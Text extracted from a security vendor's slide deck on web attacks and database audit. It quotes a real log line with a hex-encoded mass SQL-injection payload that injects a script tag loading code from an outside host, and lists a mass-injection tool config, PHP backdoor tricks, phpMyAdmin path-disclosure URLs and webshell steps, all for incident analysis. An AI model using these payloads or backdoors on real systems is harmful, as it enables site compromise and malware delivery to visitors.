數(shù)據(jù)庫安全審計ppt課件

WebApplicationSecurityandDatabaseAuditMiscs,DBAPPSecurityInc杭州安恒信息技術(shù)有限公司FrankdbappSFrank.Fan,主講人,本期要點：,Web應(yīng)用安全挑戰(zhàn)和分析數(shù)據(jù)庫審計安全風(fēng)險+管理風(fēng)險-審計,主要內(nèi)容,公司簡介數(shù)據(jù)庫安全審計概念各類規(guī)范要求和數(shù)據(jù)庫審計系統(tǒng)需求分析明御數(shù)據(jù)庫審計與風(fēng)險控制系統(tǒng)案例分析小結(jié),2008北京奧組委安全產(chǎn)品和服務(wù)提供商,作為2008北京奧組委安全產(chǎn)品和服務(wù)提供商，2008年9月安恒信息被2008北京奧運會組委會授予08奧運安全保障杰出貢獻(xiàn)獎。,ManyIncidentHandlingSupport,黑客產(chǎn)業(yè)鏈,收費傳播流氓軟件,拒絕服務(wù)攻擊,發(fā)送垃圾郵件,主動攻擊勒索網(wǎng)站,受雇攻擊收取傭金,總共檢測網(wǎng)站近700家90%網(wǎng)站存在嚴(yán)重安全隱患部分網(wǎng)站已經(jīng)被掛馬或被黑客控制,Agenda,MassInjectionAttackToolRevealedPHPBackdoorTipsSomehackingtipsaboutphpmydamin,MassInjectionToolRevealed,HowdidWefindit?FromaBotMachineduringIncidentHandling,Realcaseinincidenthandling!,2008-05-1300:28:25W3SVC6282499371POST/news_default.asptid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-23Mozilla/3.0+(compatible;+Indy+Library)20000,Realcontent,DECLARETvarchar(255),Cvarchar(255)DECLARETable_CursorCURSORFOR,fromsysobjectsa,syscolumnsbwherea.id=b.idanda.xtype=uand(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)OPENTable_CursorFETCHNEXTFROMTable_CursorINTOT,CWHILE(FETCH_STATUS=0)BEGINexec(update+T+set+C+=rtrim(convert(varchar,+C+)+)FETCHNEXTFROMTable_CursorINTOT,CENDCLOSETable_CursorDEALLOCATETable_Cursor,Keypart:,MassInjectionToolRevealed,MassInjectionToolRevealed,MassInjectionTool-Config.ini,initedkey=inurl:(.aspx?-(gov)自動產(chǎn)生ranklimit=1000000cipin=50timeout=20process=1retry=3thread=88bufferlength=10cpu=115sellang=0scanmode=0chkbox1=1chkbox2=0chkbox3=1chkbox4=0chkbox5=1chkbox6=0chkbufferlength=1chkranklimit=0IgnoreUrl=#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$AIgnoreKey=NotFound#$D#$A盜鏈#$D#$A文件不存在#$D#$A,PHPbackdoor,Basename()Include()Eval()Preg_replace(),Basename(),?,Include(),Modifyconfigurationfile,php.ini.htaccess,Updatephp.ini,Update.htaccess文件,.htaccess#php_valueauto_prepend_file.htaccess,Somehackingtipsaboutphpmydamin,1.Getphpmyadminsabsolutepath(Multiversionsupport)2.InferenceVariableinfo(mysqlrelated)3、Package(defaultstuff)4、Errorinfoinference5、phpinfoEnable6、Injection7、Getwebshell,Getphpmyadminsabsolutepath,http:/xx/phpmyadmin/themes/darkblue_orange/layout.inc.phphttp:/xx/phpMyAdmin/index.php?lang=1http:/xx/phpmyadmin/libraries/select_lang.lib.phphttp:/xx/phpmyadmin/scripts/check_lang.phphttp:/xx/phpmyadmin/libraries/export/xls.php,三、Package,APMServC:APM_SetupServerphpMyAdminAppServC:AppServwwwphpMyAdminXAMPPC:xamppphpMyAdmin.,七、GetWebshell,Usedumpfiletogetwebshell,RealCaseusedsomecodehardening,RealCaseCookieInjection,DefenseTips,WebApplicationFirewallChallengeCodeandConfigurationhardeningChallenge,WebApplicationFirewall(WAF)歷史,Web應(yīng)用防火墻第一代：流方式Web應(yīng)用防火墻第二代：,第二代Web應(yīng)用防火墻,支持全透明直連部署HTTPS全透明支持Web加速功能抗各類Web攻擊,第二部分：數(shù)據(jù)庫審計概念審計信息安全審計數(shù)據(jù)庫審計,審計,檢查、驗證目標(biāo)的準(zhǔn)確性和完整性，用以防止虛假數(shù)據(jù)和欺騙行為，以及是否符合既定的標(biāo)準(zhǔn)、標(biāo)竿和其它審計原則薩班斯法案美國史上最嚴(yán)厲的審計法則企業(yè)內(nèi)部控制規(guī)范國內(nèi)審計規(guī)范，主要目的在于加強(qiáng)和規(guī)范企業(yè)內(nèi)部控制，提高企業(yè)經(jīng)營管理水平和風(fēng)險行為防范能力財務(wù)審計、IT審計信息安全審計,信息安全審計,收集并評估證據(jù)以決定一個計算機(jī)系統(tǒng)是否有效做到保護(hù)資產(chǎn)、維護(hù)數(shù)據(jù)完整、完成目標(biāo)，同時最經(jīng)濟(jì)的使用資源薩班斯法案強(qiáng)調(diào)加強(qiáng)與財務(wù)報表相關(guān)的IT系統(tǒng)內(nèi)部控制，其中，IT系統(tǒng)內(nèi)部控制是緊密圍繞信息安全審計這一核心的。巴賽爾新資本協(xié)定(BaselII)，要求全球銀行必須做好風(fēng)險控管(riskmanagement)，而這項“金融作業(yè)風(fēng)險”的防范正需要業(yè)務(wù)信息安全審計為依托。企業(yè)內(nèi)部控制具體規(guī)范明確要求計算機(jī)信息系統(tǒng)應(yīng)采取權(quán)責(zé)分配及職責(zé)分工、建立訪問安全策略等審計措施以加強(qiáng)提高信息系統(tǒng)的可靠性、穩(wěn)定性、安全性及數(shù)據(jù)的完整性和準(zhǔn)確性。ISO17799、CC、PCI,數(shù)據(jù)庫安全審計,確保數(shù)據(jù)的完整性數(shù)據(jù)庫安全審計，通過對數(shù)據(jù)庫安全性相關(guān)的操作進(jìn)行審計，監(jiān)測指定用戶的行為，掌握數(shù)據(jù)庫使用狀況。數(shù)據(jù)庫審計是信息安全審計的重要組成部分。數(shù)據(jù)庫審計的目的在于確保數(shù)據(jù)的完整性全面了解數(shù)據(jù)庫實際發(fā)生的情況可疑行為發(fā)生時可以自動啟動預(yù)先設(shè)置的告警流程，防范數(shù)據(jù)庫風(fēng)險的發(fā)生,第三部分：數(shù)據(jù)庫審計系統(tǒng)需求分析安全需求分析數(shù)據(jù)庫安全攻擊事件正在升級數(shù)據(jù)庫安全分析現(xiàn)有安全解決方案無法有效應(yīng)對數(shù)據(jù)庫攻擊行為相關(guān)法律法規(guī)數(shù)據(jù)庫審計系統(tǒng)應(yīng)滿足的要求,數(shù)據(jù)庫安全攻擊事件某系統(tǒng)開發(fā)工程師通過互聯(lián)網(wǎng)入侵移動中心數(shù)據(jù)庫，盜取沖值卡某醫(yī)院數(shù)據(jù)庫系統(tǒng)遭到非法入侵，導(dǎo)致上萬名患者私隱信息被盜取某網(wǎng)游公司內(nèi)部數(shù)據(jù)庫管理人員通過違規(guī)修改數(shù)據(jù)庫數(shù)據(jù)盜竊網(wǎng)游點卡黑客利用SQL注入攻擊，入侵某防病毒軟件數(shù)據(jù)庫中心，竊取大量機(jī)密信息，導(dǎo)致該防病毒軟件公司嚴(yán)重?fù)p失某證券交易所內(nèi)部數(shù)據(jù)庫造黑客股民入侵，盜竊證券交易內(nèi)部報告針對數(shù)據(jù)庫進(jìn)行的安全攻擊事件正在升級！,數(shù)據(jù)庫審計系統(tǒng)需求分析安全需求分析,數(shù)據(jù)庫安全分析,數(shù)據(jù)庫面臨的風(fēng)險,內(nèi)部人員誤操作、違規(guī)操作、越權(quán)操作第三方維護(hù)人員安全隱患最高權(quán)限用戶操作多人共用一個帳號員工離職后泄漏公司信息,復(fù)雜的業(yè)務(wù)應(yīng)用+異構(gòu)的網(wǎng)絡(luò)環(huán)境+高度集中的信息共享使企業(yè)核心數(shù)據(jù)庫面臨更大的安全挑戰(zhàn),現(xiàn)有的安全解決方案,現(xiàn)有的安全解決方案不能有效應(yīng)對,防火墻只能檢測網(wǎng)絡(luò)層的攻擊無法阻攔來自網(wǎng)絡(luò)內(nèi)部的非法操作無法動態(tài)識別或自適應(yīng)地調(diào)整規(guī)則對WEB應(yīng)用,端口80或443必須開放,IDS/IPS只檢測已知特征對數(shù)據(jù)層的信息缺乏深度分析，誤報/漏報率很高沒有對session/user的跟蹤；不能保護(hù)SSL流量針對網(wǎng)絡(luò)層,由于數(shù)據(jù)庫本身的重要性以及脆弱性，國家以及國際上都制定了相關(guān)的法律法規(guī)來指導(dǎo)并規(guī)范數(shù)據(jù)庫信息系統(tǒng)的安全建設(shè)其中最重要的是明確了獨立數(shù)據(jù)庫審計系統(tǒng)的必要性和重要性,數(shù)據(jù)庫審計系統(tǒng)需求分析相關(guān)法律法規(guī),信息安全等級保護(hù)測評準(zhǔn)則信息安全等級保護(hù)測評準(zhǔn)則第六章“第二級安全控制測評”中第一節(jié)“安全技術(shù)測評”主機(jī)系統(tǒng)安全審計中明確提出：安全審計應(yīng)覆蓋到服務(wù)器上的每個操作系統(tǒng)用戶和數(shù)據(jù)庫用戶安全審計應(yīng)記錄系統(tǒng)內(nèi)重要的安全相關(guān)事件，包括重要用戶行為、系統(tǒng)資源的異常使用和重要系統(tǒng)命令的使用等安全相關(guān)事件的記錄應(yīng)包括日期和時間、類型、主體標(biāo)識、客體標(biāo)識、事件的結(jié)果等審計記錄應(yīng)受到保護(hù)避免受到未預(yù)期的刪除、修改或覆蓋等,信息安全等級保護(hù)測評準(zhǔn)則第七章“第三級安全控制測評”中第一節(jié)“安全技術(shù)測評”主機(jī)系統(tǒng)安全審計中明確提出：安全審計應(yīng)覆蓋到應(yīng)用系統(tǒng)的每個操作系統(tǒng)用戶和數(shù)據(jù)庫用戶安全審計應(yīng)記錄應(yīng)用系統(tǒng)重要的安全相關(guān)事件，包括重要用戶行為、系統(tǒng)資源的異常使用和重要系統(tǒng)功能的執(zhí)行等安全相關(guān)事件的記錄應(yīng)包括日期和時間、類型、主體標(biāo)識、客體標(biāo)識、事件的結(jié)果等安全審計應(yīng)可以根據(jù)記錄數(shù)據(jù)進(jìn)行分析，并生成審計報表安全審計應(yīng)可以對特定事件，提供指定方式的實時報警審計進(jìn)程應(yīng)受到保護(hù)避免受到未預(yù)期的中斷審計記錄應(yīng)受到保護(hù)避免受到未預(yù)期的刪除、修改或覆蓋等,信息安全等級保護(hù)測評準(zhǔn)則第七章“第四級安全控制測評”中第一節(jié)“安全技術(shù)測評”主機(jī)系統(tǒng)安全審計中明確提出：安全審計應(yīng)覆蓋到服務(wù)器和客戶端上的所有操作系統(tǒng)用戶和數(shù)據(jù)庫用戶安全審計應(yīng)記錄系統(tǒng)內(nèi)重要的安全相關(guān)事件，包括重要用戶行為、系統(tǒng)資源的異常使用和重要系統(tǒng)命令的使用安全相關(guān)事件的記錄應(yīng)包括日期和時間、類型、主體標(biāo)識、客體標(biāo)識、客體敏感標(biāo)記、事件的結(jié)果等安全審計應(yīng)可以根據(jù)記錄數(shù)據(jù)進(jìn)行分析，并生成審計報表安全審計應(yīng)可以對特定事件，提供指定方式的實時報警審計進(jìn)程應(yīng)受到保護(hù)避免受到未預(yù)期的中斷審計記錄應(yīng)受到保護(hù)避免受到未預(yù)期的刪除、修改或覆蓋等安全審計應(yīng)能跟蹤監(jiān)測到可能的安全侵害事件，并終止違規(guī)進(jìn)程安全審計應(yīng)根據(jù)信息系統(tǒng)的統(tǒng)一安全策略，實現(xiàn)集中審計系統(tǒng)設(shè)備時鐘應(yīng)與時鐘服務(wù)器時鐘保持同步,等級保護(hù)數(shù)據(jù)庫管理技術(shù)要求計算機(jī)信息系統(tǒng)安全等級保護(hù)數(shù)據(jù)庫管理技術(shù)要求第四章“數(shù)據(jù)庫管理系統(tǒng)安全技術(shù)要求”中第四節(jié)“數(shù)據(jù)庫安全審計”中明確提出數(shù)據(jù)庫管理系統(tǒng)的安全審計應(yīng)：建立獨立的安全審計系統(tǒng)定義與數(shù)據(jù)庫安全相關(guān)的審計事件設(shè)置專門的安全審計員設(shè)置專門用于存儲數(shù)據(jù)庫系統(tǒng)審計數(shù)據(jù)的安全審計庫提供適用于數(shù)據(jù)庫系統(tǒng)的安全審計設(shè)置、分析和查閱的工具,ISO體系,BS7799/ISO27001BS7799-1（ISO）1999信息技術(shù)信息安全管理業(yè)務(wù)規(guī)范第十章“系統(tǒng)開發(fā)與維護(hù)”中第二節(jié)“應(yīng)用系統(tǒng)中的安全”明確提出：為“防止應(yīng)用系統(tǒng)中用戶數(shù)據(jù)的丟失、修改或濫用”，“應(yīng)用系統(tǒng)應(yīng)設(shè)計包含適當(dāng)?shù)目刂拼胧┖蛯徲嬜粉櫥蚧顒尤罩居涗?，包括在用戶寫入的?yīng)用程序中。這些系統(tǒng)應(yīng)包括對輸入數(shù)據(jù)、內(nèi)部處理和輸出數(shù)據(jù)的檢驗功能。”BS7799-22002信息技術(shù)信息安全管理系統(tǒng)規(guī)范第四章“詳細(xì)監(jiān)控”中第七節(jié)“訪問控制”第7小節(jié)“監(jiān)控對系統(tǒng)的訪問和使用”明確提出：為實現(xiàn)“探測未經(jīng)授權(quán)的行為”的目標(biāo)，“應(yīng)提供對異常事件和與安全相關(guān)事件的審計日志”。,ISO15408ISO15408-2安全功能要求明確要求數(shù)據(jù)庫安全審計應(yīng)包括：識別、記錄、存儲和分析那些與安全相關(guān)活動（即由TSP控制的活動）有關(guān)的信息。檢查審計記錄結(jié)果可用來判斷發(fā)生了哪些安全相關(guān)活動以及哪個用戶要對這些活動負(fù)責(zé)。,支付卡行業(yè)數(shù)據(jù)安全標(biāo)準(zhǔn)（PCI）PCI驗證訪問任何數(shù)據(jù)庫（其中包括持卡人數(shù)據(jù)）的所有操作。這包括應(yīng)用程序、管理員和所有其他用戶的訪問操作。8.5.16.a檢查數(shù)據(jù)庫和應(yīng)用程序配置設(shè)置，以確定用戶身份認(rèn)證和數(shù)據(jù)庫的訪問包括以下內(nèi)容：所有用戶在訪問前必須進(jìn)行身份認(rèn)證所有的用戶訪問數(shù)據(jù)庫、查詢數(shù)據(jù)庫和操作數(shù)據(jù)庫（例如移動、復(fù)制、刪除）行為必須只能通過編程方法（例如，通過存儲的程序）只有數(shù)據(jù)庫管理員才能直接訪問數(shù)據(jù)庫或查詢數(shù)據(jù)庫。8.5.16.b檢查數(shù)據(jù)庫應(yīng)用程序和相關(guān)應(yīng)用程序ID，以確定應(yīng)用程序ID僅限應(yīng)用程序（而不是個人用戶或其他流程）使用。,期貨公司信息技術(shù)管理指引期貨公司信息技術(shù)管理指引第二章“一級信息技術(shù)管理指引”第四節(jié)“信息安全”中明確指出“安全審計”應(yīng)滿足：核心業(yè)務(wù)系統(tǒng)的主要業(yè)務(wù)操作應(yīng)產(chǎn)生審計記錄，包括時間、發(fā)起者、類型、描述和結(jié)果等信息。應(yīng)采取有效措施防止刪除、修改或覆蓋審計記錄第三章“二級信息技術(shù)管理指引”、第四章“三級信息技術(shù)管理指引”以及“四級信息技術(shù)管理指引”中都有相應(yīng)的內(nèi)容明確“安全審計”的相關(guān)內(nèi)容,綜述,綜上所述：一個完善數(shù)據(jù)庫審計系統(tǒng)是數(shù)據(jù)庫信息系統(tǒng)的安全建設(shè)必不可缺的同時，一個完善的數(shù)據(jù)庫審計系統(tǒng)應(yīng)滿足以下要求：,數(shù)據(jù)庫審計系統(tǒng)應(yīng)滿足的具體要求,第四部分：數(shù)據(jù)庫審計的挑戰(zhàn)以及明御數(shù)據(jù)庫審計與風(fēng)險控制系統(tǒng)數(shù)據(jù)庫審計的挑戰(zhàn)案例分析,挑戰(zhàn)之一：數(shù)據(jù)庫自身審計的矛盾和缺陷,概述性能影響巨大沒有獨立性和可信性沒有存儲能力信息缺失,挑戰(zhàn)之二：海量數(shù)據(jù)VS細(xì)粒度,產(chǎn)品概述海量數(shù)據(jù)細(xì)粒度定位和策略控制的需求,挑戰(zhàn)之三：完整審計的挑戰(zhàn),概述返回信息更重要，但是更難把握各種方式訪問,挑戰(zhàn)